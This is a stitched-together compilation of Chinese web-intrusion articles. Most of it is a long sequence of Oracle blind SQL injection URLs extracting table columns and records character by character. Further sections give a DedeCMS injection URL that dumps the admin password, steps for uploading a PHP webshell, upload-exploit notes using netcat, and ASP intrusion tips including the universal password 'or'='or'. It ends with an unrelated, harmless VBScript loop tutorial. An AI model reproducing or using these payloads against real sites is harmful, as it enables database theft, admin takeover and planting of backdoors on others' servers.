www.test.net/index_kaoyan_view.jsp?id=117 And 5=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

 以下为猜解第一列第一个字段的第一位为：C

www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 78=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 78>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 71=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 71>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 68=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 68>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 66=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 66>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 67=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

 以下为猜解第一列第一个字段的第一位为:L

www.test.net/index_kaoyan_view.jsp?id=117 And 79=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 79>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 73=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 73>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 76=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))

 以下为猜解第一列第一个字段的第三位为：A

www.test.net/index_kaoyan_view.jsp?id=117 And 83=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 83>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 77=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 77>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 70=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 70>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 67>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 84=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 84>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 81=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 81>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 82=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 82>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))

 以下为猜解第二列：

www.test.net/index_kaoyan_view.jsp?id=117 And 74=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 74>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 72=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 76>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 86=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 86>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 87=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 87>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 85=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 85>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 88=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),7,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 88>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),7,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 89=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),7,1))

第一个记录的第一位值为：

4、猜解数据值：

 数据值长度为一位：1

www.test.net/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT COUNT(*)FROM AD)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 1>=nvl(length((SELECT COUNT(*)FROM AD)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 0=nvl(length((SELECT COUNT(*)FROM AD)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 0>nvl(length((SELECT COUNT(*)FROM AD)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 1=nvl(length((SELECT COUNT(*)FROM AD)),0)

 数据长度为：9条记录

www.test.net/index_kaoyan_view.jsp?id=117 And 52=ascii(substr((SELECT COUNT(*)FROM AD),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 52>ascii(substr((SELECT COUNT(*)FROM AD),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 55=ascii(substr((SELECT COUNT(*)FROM AD),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 55>ascii(substr((SELECT COUNT(*)FROM AD),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 56=ascii(substr((SELECT COUNT(*)FROM AD),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 56>ascii(substr((SELECT COUNT(*)FROM AD),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 57=ascii(substr((SELECT COUNT(*)FROM AD),1,1))

以下猜解记录值

 第一行第一列记录的长度为：1，值为：1

www.test.net/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 1>=nvl(length((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 0=nvl(length((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 0>nvl(length((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 1=nvl(length((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 52=ascii(substr((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 52>ascii(substr((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 49=ascii(substr((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

 第一行第一列记录的长度为：1，值为：2

www.test.net/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 1>=nvl(length((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 0=nvl(length((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 0>nvl(length((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 1=nvl(length((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 52=ascii(substr((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 52>ascii(substr((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 49=ascii(substr((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

 第二行第一列记录的长度为：1，值为：2

www.test.net/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 1>=nvl(length((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 0=nvl(length((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 0>nvl(length((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 1=nvl(length((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 52=ascii(substr((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 52>ascii(substr((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 49=ascii(substr((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 49>ascii(substr((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 50=ascii(substr((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

 第二行第二列记录的长度为：1，值为：2

www.test.net/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 1>=nvl(length((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 0=nvl(length((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 0>nvl(length((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 1=nvl(length((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 52=ascii(substr((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 52>ascii(substr((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 49=ascii(substr((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

篇3：dedecms注射漏洞脚本安全

注释：先注册..输入地址后，要等一会刷新就可以看到密码了

作者不知道是谁

问题出现在buy_action.php

没有对pid传递进行足够的重视

导致出现SQL注射问题!

注册地址

/member/index_do.php?fmdo=user&dopost=regnew

爆管理员密码

/member/buy_action.php?product=member&pid=1%20and%201=11%20union%20select%201,2,substring(pwd,9,16),4,5%20from%20%23@__admin/*

用很大。如果你找不到可以利用的那就是自己RP问题

反正我们是找到很多了，而且是流量比较大的站，很不错的站。

更正一下：

LZ发的代码因为这个.NET版本的论坛有问题所以没显示全全部代码是：

暴管理员密码：

CODE:

/member/buy_action.php?product=member&pid=1%20and%201=11%20union

%20select%201,2,substring(pwd,9,16),4,5%20from%20%23@__admin/*

首先在

GOOGLE搜Power by DedeCms

先注册一个号,注册成功后

直接输入下面的

include/dialoguser/select_soft.php或者

include/dialoguser/select_media.php

然后上传一个PHP马，

先要改下后缀，改可以上传的就可以了，然后再改名的地址输入木马名字.PHP

上传成功

直接访问

所在目录的路径/木马名字.php

一个SHELL就拿到了，

篇4：PHP和ASP两种脚本上传漏洞探究

1 传漏洞利用的原理只是针对form格式上传的asp和php脚本***

nc(netcat)

用于提交数据包

dos界面下运行:

nc -vv www.***.com 80<1.txt

-vv: 回显

80: www端口

1.txt: 就是你要发送的数据包 (更多使用方法请查看本区的帖子)

wse(wsockexpert) 对本机端口的监视,抓取ie提交的数据包

2 漏洞原理

下面例子假设的前提

www主机: www.***.com;

bbs路径 : /bbs/

漏洞源于对动网上传文件的研究,建议有一定编程经验的看看dvbbs的upfile.asp文件,没有必要全部看懂，

PHP和ASP两种脚本上传漏洞探究

，

upfile是通过生成一个form表上传,如下

篇5：脚本入侵 ASP网站入侵常用的一些技巧

脚本入侵-ASP网站入侵一些技巧先说明下先看下是不是html转的asp生成的站

如果是html格式的站

我们先打开网站

然后单击鼠标右键按查看源文件-编辑-查找

输入asp 看有没有网站ASP文件或ASP带参数

1：注入点

先把IE菜单=>工具=>Internet选项=>高级=>显示友好 HTTP 错误信息前面的勾去掉，

否则，不论服务器返回什么错误，IE都只显示为HTTP 500服务器错误，不能获得更多的提示信息。

site/web0day.asp?id=1

我们在这个地址后面加上单引号’ 然后and 1=1 正确 and 1=2 错误的话就说明存在注入漏洞了！

注入点爆库方法

先举个例子一个注入site/asp/web0day.asp?id=1

然后改成爆库site/asp%5cweb0day.asp?id=1

利用%5c爆数据库

如果不注入点的话就用批量扫描注入点工具扫描防注入就用中转注入

2：上传漏洞

用一些扫描上传漏洞字典或工具扫描百度搜索把一大把

3：后台

1：

一般站都是admin manage目录有这个目录不可以见后台

用一些扫描后台漏洞字典或工具扫描

注入如果没有办法的情况我们就一个网站目录扫描

比如：www.xxx.com/manage/

2：或单击网站图片按鼠标右键-属性看地址

比如

www.xxx.com/images/123.jpg

我们可以看下可以列目录不

www.xxx.com/images/

如果是www.xxx.com/admin/images/123.jpg

一般都后台www.xxx.com/admin/有时候可以直接转到后台

不行的话就直接这个目录用字典或工具扫描

3：看网站做下面版权备案那里看

比如Powered by xxx的或网站连接

4:后台入侵

一般入侵后台常用的密码admin admin admin admin888 等等

万能密码'or'='or' 'xor 'xor

5：编辑器漏洞不会的就在百度搜索把一大把

6：注入点入侵的一些问题

1：有时候注入点找不到表段先看后台有没有什么相关的资源

看网站做下面版权备案那里看比如Powered by xxx的或网站连接在百度下源码分析

2：有时候注入点找不到字段我们就到后台-按查看源文件看用户一些字段

篇6：ASP脚本循环语句详细教学

ASP脚本循环语句详细教学

ASP 动态服务器页面环境的特点就在于它是通过一种或几种脚本语言而写成的，脚本语言可以看作是编程语言的简化版，它易于学习和掌握，这给广大动态网站的设计者们提供了相当大的便利。可以这么说 : 脚本语言运用的得当与否直接关系到 ASP 应用程序的优与劣。继上一篇我们学习了脚本语言 VBScript 的函数和条件语句后，今天我们继续来看看 VBScript 中的循环语句。

循环语句的作用就是重复执行程序代码，循环可分为三类：一类在条件变为“假”之前重复执行语句，一类在条件变为“真”之前重复执行语句，另一类按照指定的次数重复执行语句。在 VBScript 中可使用下列循环语句：

Do...Loop: 当(或直到)条件为“真”时循环。

While...Wend: 当条件为“真”时循环。

For...Next: 指定循环次数，使用计数器重复运行语句。

For Each...Next: 对于集合中的每项或数组中的每个元素，重复执行一组语句。

我们先来看看 Do...Loop，它是可以多次(次数不定)运行语句块。当条件为“真”时或条件变为“真”之前，重复执行语句块。请看下例： < html>< head>

< title>DoLoop.asp< /title>< body bgcolor=“#FFFFFF”>< /head>

请将今年到本月为止的每个月份的销售结算记录填写在本页之上。

< %

counter = 1

thismonth = month(now)

Do while counter < thismonth + 1

response.write “ ” & counter & “ 月份 : ”

response.write “______________________________” & “ ”

If counter >13 then

exit do

end if

counter = counter+1

Loop

< hr>< /body>< /html>

这段 ASP 程序运用循环语句制作了一张销售结算记录表，将以上代码剪贴至记事簿保存为 DoLoop.asp，并在浏览器中以 HTTP 方式进行浏览，根据当前的月份的不同，你将看到如下图的结果。

